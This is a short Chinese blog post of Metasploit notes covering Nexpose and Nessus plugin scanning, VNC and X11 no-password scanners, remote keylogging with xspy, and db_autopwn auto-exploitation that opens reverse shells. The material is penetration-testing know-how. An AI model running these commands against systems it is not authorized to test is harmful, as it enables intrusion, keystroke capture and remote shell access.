zoukankan      html  css  js  c++  java
  • metasploit漏洞扫描

    1.常用普通功能

    db_destory  //删除数据库
    nc ip port  //获取基本系统信息
    

    2.nexpose

    连接数据库
    load nexpose  //载入nexpose插件
    msf > help
    msf > nexpose_connect -h   //查看连接nexpose需要的参数
    msf >nexpose_connect 用户名:密码 ip地址 ok——登录到nexpose
    msf >nexpose_scan	//开始扫描
    msf > db_hosts -c adress   //安地址分类查看结果
    msf >db_vulns  //查看详细信息
    

    3.nessus

    msf >load nessus
    msf >nessus_help
    msf >nessus_policy_list	//查看扫描选项
    msf >nessus_sacn_new 选项号 任务名字 IP地址
    msf >nessus_scan_status   //扫描状态
    msf >nessus_report_list   //所有扫描结果报告
    msf >nessus_report_get ID号		//下载某个报告
    

    4.其他

    vnc无密码扫描
    msf > use auxiliary/scanner/vnc/vnc_none_auth
    
    x11无密码扫描
    msf > use auxiliary/x11/open_x11
    
    xspy远程键盘记录
    ./xspy -display ip地址
    

    导入漏洞扫描工具生成文件实现自动化攻击
    db_autopwn -e -t -r -x -p
    e(所有目标发起攻击)
    t(显示所有匹配的模块)
    r(反弹shell的攻击载荷)
    x(根据漏洞选择攻击模块)
    p(根据开放的端口选择攻击模块)
    攻击成功返回一个shell

  • 相关阅读:
    Struts2拦截器
    Struts2执行过程
    struts.xml属性extends的执行顺序和剖析源码
    Struts2请求流程图
    8.29 脏检查笔记
    transactionManager 以及datasource type解析
    Mybatis
    Interceptor
    ongl(示例3-6 多值类型的数据处理)
    ongl(原始类型和包装类型)
  • 原文地址:https://www.cnblogs.com/WTa0/p/11810866.html
Copyright © 2011-2022 走看看